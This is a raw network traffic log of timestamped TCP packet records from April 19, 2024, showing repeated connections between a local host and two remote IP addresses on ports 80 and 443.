                                                                                                                                    Apr 19, 2024 13:42:37.815685034 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.815722942 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.815754890 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.815789938 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.815820932 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.815853119 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.815884113 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.816065073 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.816245079 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.816595078 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.816627979 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.816658974 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.816765070 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.817475080 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.821958065 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.822020054 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.822093964 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.822093964 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.856698990 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.856759071 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.916848898 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.916966915 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.917320013 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.917387962 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.026465893 CEST4434975034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.028038025 CEST49750443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:38.028059006 CEST4434975034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.041788101 CEST49750443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:38.042074919 CEST4434975034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.042124987 CEST49750443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:38.042809963 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.147314072 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.147569895 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.147696972 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.251983881 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.252191067 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.252365112 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.356781960 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.599740982 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.599802971 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.599853992 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.760723114 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.764345884 CEST4975280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.865760088 CEST8049751104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.865824938 CEST4975180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.868630886 CEST8049752104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.868902922 CEST4975280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.868902922 CEST4975280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:38.973428965 CEST8049752104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.973742008 CEST8049752104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:38.974040985 CEST4975280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.078604937 CEST8049752104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.323674917 CEST8049752104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.323707104 CEST8049752104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.323776960 CEST4975280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.444489002 CEST4975480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.548782110 CEST8049754104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.549010038 CEST4975480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.549010038 CEST4975480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.653227091 CEST8049754104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.653772116 CEST8049754104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.654067039 CEST4975480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.705321074 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.749403000 CEST4975480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.758536100 CEST8049754104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.809875011 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.810117006 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.810117006 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.854752064 CEST8049754104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.854974985 CEST4975480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.861887932 CEST4975280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.868324995 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.915081978 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.915143013 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.915489912 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.972532988 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:39.973336935 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:39.973391056 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.020067930 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.077879906 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.078299046 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.078471899 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.182923079 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.272536039 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.272599936 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.273741007 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.414064884 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.414129972 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.414226055 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.536453009 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.536526918 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.537324905 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.640969992 CEST8049756104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.641031981 CEST8049755104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.641053915 CEST4975680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.641201019 CEST4975580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.641974926 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.642079115 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.642226934 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.746450901 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.746690035 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:40.746898890 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:40.851576090 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.306287050 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.306350946 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.306412935 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.427139997 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.427963018 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.532495022 CEST8049757104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.532557964 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.532574892 CEST4975780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.532635927 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.532748938 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.637361050 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.637448072 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:41.637764931 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:41.742480040 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.052294016 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.052354097 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.052438021 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.176286936 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.176981926 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.281491041 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.281553030 CEST8049758104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.281580925 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.281608105 CEST4975880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.281712055 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.385862112 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.386126041 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.386305094 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.490716934 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.751432896 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.751496077 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.751564980 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.878777981 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.879141092 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.983434916 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.983541965 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.983623981 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:42.984157085 CEST8049761104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:42.984225035 CEST4976180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.087814093 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.087999105 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.088346004 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.192555904 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.444557905 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.444622040 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.444683075 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.567887068 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.568571091 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.672705889 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.672791958 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.673243046 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.673324108 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.673417091 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.777919054 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.777977943 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.778137922 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.882801056 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.129538059 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.129601002 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.129652977 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.388788939 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.389205933 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.493689060 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.493758917 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.493841887 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.493904114 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.655472040 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.760026932 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.761169910 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.766926050 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.871901989 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:45.123068094 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:45.123131990 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:45.123378992 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.483550072 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.588154078 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.588263035 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.594906092 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.615731955 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.699558020 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.699615002 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.699899912 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.720212936 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.720484972 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.720484972 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.804733992 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.825052977 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.825110912 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.825397968 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.932939053 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.957077980 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.957139015 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.957220078 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.097349882 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.097381115 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.097563982 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.221528053 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.221581936 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.222002983 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.222119093 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.326606035 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.326668024 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.326694965 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.326822042 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.326869965 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.326900959 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.327096939 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.327207088 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.327318907 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.431381941 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.431791067 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.435801983 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.540453911 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.804562092 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.804625988 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.805222034 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.939798117 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.941648006 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.047456026 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.047539949 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.048835993 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.048926115 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.049266100 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.153775930 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.153839111 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.154284000 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.259099007 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.517513990 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.517577887 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.517627954 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.650852919 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.651434898 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.755987883 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.756051064 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.756108046 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.756139040 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.756247044 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.860625029 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.861033916 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.861207008 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.965909004 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.271919012 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.271981955 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.272043943 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.393722057 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.394220114 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.498718977 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.498802900 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.498908043 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.499660969 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.499715090 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.603430986 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.603596926 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.603746891 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.708255053 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.974124908 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.974186897 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.974266052 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.097879887 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.098381996 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.202903986 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.203480005 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.203577995 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.203712940 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.203712940 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.308069944 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.308199883 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.308363914 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.413033009 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.572441101 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.572505951 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.572554111 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.712311983 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.713025093 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.817548037 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.817606926 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.817692995 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.817934990 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.817934990 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.922272921 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.922333002 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.922662973 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.027116060 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.285429001 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.285490990 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.285685062 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.409761906 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.410149097 CEST4977380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.514431953 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.514736891 CEST8049773104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.514841080 CEST4977380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.514935970 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.514950037 CEST4977380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.619445086 CEST8049773104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.619503975 CEST8049773104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.619663000 CEST4977380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.724267960 CEST8049773104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.961415052 CEST4977580192.168.2.4104.21.57.61
